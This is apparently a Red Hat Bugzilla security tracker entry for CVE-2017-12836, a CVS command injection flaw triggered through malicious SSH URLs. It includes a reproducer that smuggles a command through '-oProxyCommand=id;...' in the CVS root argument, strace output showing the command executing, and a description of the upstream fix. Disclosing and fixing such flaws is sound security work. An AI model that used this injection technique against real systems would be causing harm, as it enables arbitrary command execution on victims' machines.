Bug 1480800 (CVE-2017-12836)

Summary: CVE-2017-12836 cvs: Command injection via malicious ssh URLs
Product: [Other] Security Response Reporter: Adam Mariš <amaris>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED WONTFIX QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: ppisar
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2017-08-22 13:35:08 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1480801    
Bug Blocks: 1480802, 1485460    
Attachments:
Description Flags
Fix ported to 1.11.23 none

Description Adam Mariš 2017-08-11 22:22:01 UTC 
Command injection vulnerability was found in CVS that can be triggered via malicious SSH URLs.

References:

http://www.openwall.com/lists/oss-security/2017/08/11/1
Comment 1 Adam Mariš 2017-08-11 22:22:23 UTC 
Created cvs tracking bugs for this issue:

Affects: fedora-all [bug 1480801]
Comment 2 Petr Pisar 2017-08-14 08:25:32 UTC 
Reproducer:

$ CVS_RSH=/usr/bin/ssh strace -fq -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffc55abc638 /* 38 vars */) = 0
[pid 22658] execve("/usr/bin/ssh", ["/usr/bin/ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x9ce03e55c0 /* 40 vars */) = 0
Pseudo-terminal will not be allocated because stdin is not a terminal.
[pid 22659] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x8dbda2340 /* 40 vars */) = 0
[pid 22659] execve("/usr/bin/id", ["id"], 0x26c07faf80 /* 39 vars */) = 0
[pid 22659] +++ exited with 0 +++
[pid 22658] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22659, si_uid=500, si_status=0, si_utime=0, si_stime=1} ---
ssh_exchange_identification: Connection closed by remote host
[pid 22658] +++ exited with 255 +++
[pid 22657] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22658, si_uid=500, si_status=255, si_utime=0, si_stime=1} ---
[pid 22657] +++ exited with 255 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22657, si_uid=500, si_status=255, si_utime=0, si_stime=0} ---
cvs [checkout aborted]: end of file from server (consult above messages if any)
+++ exited with 1 +++

Debian's fix for cvs-1.12.14 <https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=871810;filename=cvs_1.12.13%2Breal-9%2Bdeb7u1.debdiff;msg=52> adds "--" right before the $CVS_RSH's hostname argument.
Comment 3 Petr Pisar 2017-08-14 09:07:28 UTC 
Created attachment 1313002 [details]
Fix ported to 1.11.23
Comment 4 Stefan Cornelius 2017-08-15 09:21:08 UTC 
We've seen similar flaws in other source code management tools. However, the other tools allowed attackers to hide their attack in an elegant way. I'm not aware of such a method for CVS. Thus, in order to exploit this issue, an attacker would likely have to trick a user into executing a suspect command line.
Comment 5 Stefan Cornelius 2017-08-22 13:35:15 UTC 
Statement:

Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.